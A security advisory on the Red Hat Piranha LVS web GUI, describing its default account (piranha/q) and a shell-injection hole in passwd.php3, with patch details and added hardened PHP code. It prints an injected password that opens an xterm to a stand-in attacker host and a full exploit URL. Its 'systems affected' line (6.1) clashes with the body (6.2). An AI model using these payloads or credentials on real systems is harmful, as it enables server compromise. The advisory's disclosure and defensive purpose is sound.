COMMAND
Red Hat Linux Virtual Server Package
SYSTEMS AFFECTED
RedHat 6.1
PROBLEM
The following is based on an ISS Security Advisory. ISS X-Force has
identified a backdoor password in the Red Hat Linux Piranha
product. Piranha is a package distributed by Red Hat, Inc. that
contains the Linux Virtual Server (LVS) software, a web-based
GUI, and monitoring and fail-over components. A backdoor password
exists in the GUI portion of Piranha that may allow remote
attackers to execute commands on the server. If an affected
version of Piranha is installed and the default backdoor password
remains unchanged, any remote or local user may log in to
the LVS web interface. From there LVS parameters can be changed
and arbitrary commands can be executed with the same privileges as
the web server. With this backdoor password, an attacker
could compromise the web server as well as deface and destroy the
web site.
Piranha is distributed in three Red Hat Package Manager (RPM) packages:
"piranha", "piranha-gui", and "piranha-docs". The vulnerability
is present if version 0.4.12 of piranha-gui is installed. The
current Red Hat Linux 6.2 distribution is
vulnerable. Earlier versions of the Red Hat distribution do not
contain this vulnerability.
Piranha is a collection of utilities used to administer the Linux
Virtual Server. LVS is a scalable and highly available server
designed for large enterprise environments. It allows seamless
clustering of multiple web servers through load balancing,
heartbeat monitoring, redundancy, and fail-over protection. To
the end user, the entire system is completely transparent,
appearing as if a single server is fielding every request.
Piranha is shipped with a web-based GUI that allows system
administrators to configure and monitor the cluster. The Piranha
package contains an undocumented backdoor account and password
that may allow a remote attacker access to the LVS web
administration tools. Attackers could use these tools to make
the interface execute arbitrary commands on the server.
Commands are executed with the same privilege level as the web
server, which varies based on the configuration of the system.
The vulnerability is present even if the LVS service is not used
on the system. If the affected "piranha-gui" package is installed
and the password has not been changed by the administrator, the
system is vulnerable.
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2000-0248 to this issue. This is a
candidate for inclusion in the CVE list which standardizes names
for security problems. This vulnerability was discovered and
researched by Allen Wilson of Internet Security Systems and ISS
X-Force.
Max Vision, in the interest of full disclosure, brought the
details of the piranha vulnerability to the public. To summarize, piranha is a
GUI tool for monitoring, configuring, and administering an LVS
cluster. The Red Hat 6.2 package piranha-0.4.12 provides a web-based
php3 interface which is protected by basic authentication. A
default account is provided that, if known, allows remote
users to change the piranha password as well as run arbitrary
commands on the web server by exploiting a hole in the passwd.php3
script.
There are basically two problems with the piranha-0.4.12 package
that, when combined, yield shell access for an attacker. The
reason earlier versions are not vulnerable is the shift away
from the GUI towards a web-based php3 interface.
The first problem is the default account and password that
protect the web directory containing the administrative php3
scripts. This is what ISS called a "backdoor" - which is
actually a default password. The default username/password is:
piranha/q
Ironically, the second part of the vulnerability lies
within the program that is used to change the password! By
default this is installed into /home/httpd/html/piranha/secure as
passwd.php3, or:
http://victim.example.com/piranha/secure/passwd.php3
Once you authenticate (see the first problem above), a form will come
up asking for the new password. To avoid typo-regret, you must
enter the password twice. It will then proceed to change the
piranha password to whatever you provided as the new password.
It does this by passing your input to a shell command without
filtering for metacharacters. The relevant lines of passwd.php3:
echo "<TD>The passwords you supplied match<BR>";
$temp = `/usr/bin/htpasswd -b passwords piranha $try1`;
As one can see, this allows for more creative "new passwords",
such as this one:
g23 ;/usr/X11R6/bin/xterm -display attacker.example.com:0 -ut;
Example exploit URL (requires authentication):
http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT
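The following is an added example, not Piranha's or Red Hat's code. It places the injectable backtick pattern from passwd.php3 beside a hardened replacement that never hands the new password to a shell; the function names, the password policy and the target file path are assumptions, and the bcrypt line format assumes an Apache httpd 2.4 basic-auth password file.

```php
<?php
// Added example (not from piranha-gui). Function names and paths are hypothetical.

// VULNERABLE pattern, as shipped in piranha-gui 0.4.12: the request field
// $try1 is interpolated unfiltered into a shell command via backticks, so a
// "password" containing ';' runs a second command as the web server user.
function change_password_vulnerable(string $try1): string
{
    return `/usr/bin/htpasswd -b passwords piranha $try1`;
}

// HARDENED replacement: no shell is involved, so no metacharacter can reach one.
// The htpasswd entry is built in PHP and written to the file directly.
function change_password_hardened(string $try1, string $try2, string $file): void
{
    // Both form fields must match exactly (constant-time comparison).
    if (!hash_equals($try1, $try2)) {
        throw new InvalidArgumentException('passwords do not match');
    }
    // Minimal policy (assumed): printable ASCII, at least 8 characters, and
    // never the shipped default "q" that made the backdoor possible.
    if (strlen($try1) < 8 || !ctype_print($try1) || $try1 === 'q') {
        throw new InvalidArgumentException('password rejected by policy');
    }
    // bcrypt ($2y$) entries are accepted by httpd 2.4 basic authentication.
    $line = 'piranha:' . password_hash($try1, PASSWORD_BCRYPT) . "\n";
    if (file_put_contents($file, $line, LOCK_EX) === false) {
        throw new RuntimeException('could not write ' . $file);
    }
}

// If the external htpasswd binary really must be used, every argument is quoted
// with escapeshellarg() so the shell sees it as a single literal word.
function change_password_quoted(string $try1, string $file): void
{
    $cmd = '/usr/bin/htpasswd -b ' . escapeshellarg($file)
         . ' piranha ' . escapeshellarg($try1);
    exec($cmd, $output, $rc);
    if ($rc !== 0) {
        throw new RuntimeException('htpasswd exited with status ' . $rc);
    }
}

// Typical use from the form handler; the password file path is an assumption.
change_password_hardened(
    $_POST['try1'] ?? '',
    $_POST['try2'] ?? '',
    '/home/httpd/html/piranha/secure/passwords'
);
```

Even with quoting, `htpasswd -b` exposes the new password on the command line to anyone who can read the process list, which is why the direct-write variant is preferred.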
SOLUTION
Red Hat has provided updated piranha, piranha-docs, and piranha-gui
packages, version 0.4.13-1. ISS X-Force recommends that these patches be
installed immediately. The updated piranha-gui package addresses
the password and arbitrary command execution vulnerability. After
upgrading to piranha 0.4.13-1, users should ensure that a password
is set by logging in to the Piranha web GUI and setting one. The
updated packages are available on ftp://updates.redhat.com/6.2,
and their version number is 0.4.13-1. The file names for the new
packages are as follows:
- SRPMS/piranha-0.4.13-1.src.rpm
- alpha/piranha-0.4.13-1.alpha.rpm
- alpha/piranha-docs-0.4.13-1.alpha.rpm
- alpha/piranha-gui-0.4.13-1.alpha.rpm
- i386/piranha-0.4.13-1.i386.rpm
- i386/piranha-docs-0.4.13-1.i386.rpm
- i386/piranha-gui-0.4.13-1.i386.rpm
- sparc/piranha-0.4.13-1.sparc.rpm
- sparc/piranha-docs-0.4.13-1.sparc.rpm
- sparc/piranha-gui-0.4.13-1.sparc.rpm